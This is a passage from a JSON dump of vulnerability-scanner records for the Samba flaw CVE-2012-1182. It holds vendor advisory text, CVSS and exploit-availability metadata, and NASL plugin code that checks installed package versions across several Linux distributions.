Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls. This could result in code generated by the PIDL compiler to not sufficiently protect against buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which provides a number of bug fixes and enhancements over the previous version. In particular, improved interoperability with Active Directory (AD) domains. SSSD now uses the libndr-krb5pac library to parse the Privilege Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity Management, which relies on the capabilities of the samba4 client library, is included as a Technology Preview. This functionality and server libraries, is included as a Technology Preview. 
This functionality uses the libndr-nbt library to prepare Connection-less Lightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security Authority (LSA) and Net Logon services to allow verification of trust from a Windows system. Because the Cross Realm Kerberos Trust functionality is considered a Technology Preview, selected samba4 components are considered to be a Technology Preview. For more information on which Samba packages are considered a Technology Preview, refer to Table 5.1, 'Samba4 Package Support' in the Release Notes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was rebooted, Winbind sometimes failed to reconnect when requested by 'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users using the wbinfo tool failed. This update applies upstream patches to fix this problem and now looking up a Security Identifier (SID) for a username, or a username for a given SID, works as expected after a domain controller is rebooted. 
(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages, which fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat Enterprise Linux 6.4 and you have Samba in use, you should make sure that you uninstall the package named 'samba4' to avoid conflicts during the upgrade.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : samba4 (ELSA-2013-0506)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:samba4", "p-cpe:/a:oracle:linux:samba4-client", "p-cpe:/a:oracle:linux:samba4-common", "p-cpe:/a:oracle:linux:samba4-dc", "p-cpe:/a:oracle:linux:samba4-dc-libs", "p-cpe:/a:oracle:linux:samba4-devel", "p-cpe:/a:oracle:linux:samba4-libs", "p-cpe:/a:oracle:linux:samba4-pidl", "p-cpe:/a:oracle:linux:samba4-python", "p-cpe:/a:oracle:linux:samba4-swat", "p-cpe:/a:oracle:linux:samba4-test", "p-cpe:/a:oracle:linux:samba4-winbind", "p-cpe:/a:oracle:linux:samba4-winbind-clients", "p-cpe:/a:oracle:linux:samba4-winbind-krb5-locator", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2013-0506.NASL", "href": "https://www.tenable.com/plugins/nessus/68746", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0506 and \n# Oracle Linux Security Advisory ELSA-2013-0506 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68746);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0506\");\n\n script_name(english:\"Oracle Linux 6 : samba4 (ELSA-2013-0506)\");\n 
script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0506 :\n\nUpdated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. 
This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was\nrebooted, Winbind sometimes failed to reconnect when requested by\n'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users\nusing the wbinfo tool failed. This update applies upstream patches to\nfix this problem and now looking up a Security Identifier (SID) for a\nusername, or a username for a given SID, works as expected after a\ndomain controller is rebooted. 
(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure\nthat you uninstall the package named 'samba4' to avoid conflicts\nduring the upgrade.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-February/003301.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", 
reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:30", "description": "This update fixes CVE-2012-1182. Rebuilt to run with pytalloc 2.0.6. New samba4 alpha release.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-05-16T00:00:00", "type": "nessus", "title": "Fedora 16 : samba4-4.0.0-38.alpha16.fc16 (2012-6382)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:samba4", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-6382.NASL", "href": "https://www.tenable.com/plugins/nessus/59098", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-6382.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59098);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"FEDORA\", value:\"2012-6382\");\n\n script_name(english:\"Fedora 16 : samba4-4.0.0-38.alpha16.fc16 (2012-6382)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes CVE-2012-1182. Rebuilt to run with pytalloc 2.0.6\nNew samba4 alpha release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=804093\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/080567.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a742831d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"samba4-4.0.0-38.alpha16.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:57:43", "description": "Samba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. 
A remote, unauthenticated attacker could send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. After installing this update, the smb service will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : samba3x on SL5.x i386/x86_64 (20120410)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:samba3x", "p-cpe:/a:fermilab:scientific_linux:samba3x-client", "p-cpe:/a:fermilab:scientific_linux:samba3x-common", "p-cpe:/a:fermilab:scientific_linux:samba3x-debuginfo", "p-cpe:/a:fermilab:scientific_linux:samba3x-doc", "p-cpe:/a:fermilab:scientific_linux:samba3x-domainjoin-gui", "p-cpe:/a:fermilab:scientific_linux:samba3x-swat", "p-cpe:/a:fermilab:scientific_linux:samba3x-winbind", "p-cpe:/a:fermilab:scientific_linux:samba3x-winbind-devel", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20120410_SAMBA3X_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61297", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61297);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"Scientific Linux Security Update : samba3x on SL5.x i386/x86_64 (20120410)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote 
Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1204&L=scientific-linux-errata&T=0&P=565\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6fceb855\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-client-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-common-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-debuginfo-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-doc-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-domainjoin-gui-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-swat-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-winbind-3.5.10-0.108.el5_8\")) flag++;\nif 
(rpm_check(release:\"SL5\", reference:\"samba3x-winbind-devel-3.5.10-0.108.el5_8\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-debuginfo / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:35", "description": "According to its banner, the version of Samba 3.x running on the remote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is, therefore, affected by multiple heap-based buffer overflow vulnerabilities.\n\nAn error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling code it generates to contain multiple heap-based buffer overflow vulnerabilities. This generated code can allow a remote, unauthenticated attacker to use malicious RPC calls to crash the application and possibly execute arbitrary code as the root user.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2012-04-12T00:00:00", "type": "nessus", "title": "Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:samba:samba:*:*:*:*:*:*:*:*"], "id": "6443.PRM", "href": "https://www.tenable.com/plugins/nnm/6443", "sourceData": "Binary data 6443.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:42", "description": "A remote code execution flaw in Samba has been fixed :\n\n - PIDL based autogenerated code uses client supplied size values which allows attackers to write beyond the allocated array size. (CVE-2012-1182)\n\nAlso the following bugs have been fixed :\n\n - Samba printer name marshalling problems. 
(bnc#722663)\n\n - mount.cifs: properly update mtab during remount.\n (bnc#747906)\n\n - s3: compile IDL files in autogen, some configure tests need this.\n\n - Fix incorrect types in the full audit VFS module. Add null terminators to audit log enums. (bnc#742885)\n\n - Do not map POSIX execute permission to Windows FILE_READ_ATTRIBUTES. (bso#8631) (bnc#732572)", "cvss3": {"score": null, "vector": null}, "published": "2012-04-16T00:00:00", "type": "nessus", "title": "SuSE 11.1 Security Update : Samba (SAT Patch Number 6124)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:cifs-mount", "p-cpe:/a:novell:suse_linux:11:ldapsmb", "p-cpe:/a:novell:suse_linux:11:libsmbclient0", "p-cpe:/a:novell:suse_linux:11:libsmbclient0-32bit", "p-cpe:/a:novell:suse_linux:11:libtalloc1", "p-cpe:/a:novell:suse_linux:11:libtalloc1-32bit", "p-cpe:/a:novell:suse_linux:11:libtdb1", "p-cpe:/a:novell:suse_linux:11:libtdb1-32bit", "p-cpe:/a:novell:suse_linux:11:libwbclient0", "p-cpe:/a:novell:suse_linux:11:libwbclient0-32bit", "p-cpe:/a:novell:suse_linux:11:samba", "p-cpe:/a:novell:suse_linux:11:samba-32bit", "p-cpe:/a:novell:suse_linux:11:samba-client", "p-cpe:/a:novell:suse_linux:11:samba-client-32bit", "p-cpe:/a:novell:suse_linux:11:samba-doc", "p-cpe:/a:novell:suse_linux:11:samba-krb-printing", "p-cpe:/a:novell:suse_linux:11:samba-winbind", "p-cpe:/a:novell:suse_linux:11:samba-winbind-32bit", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_CIFS-MOUNT-120411.NASL", "href": "https://www.tenable.com/plugins/nessus/58764", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable 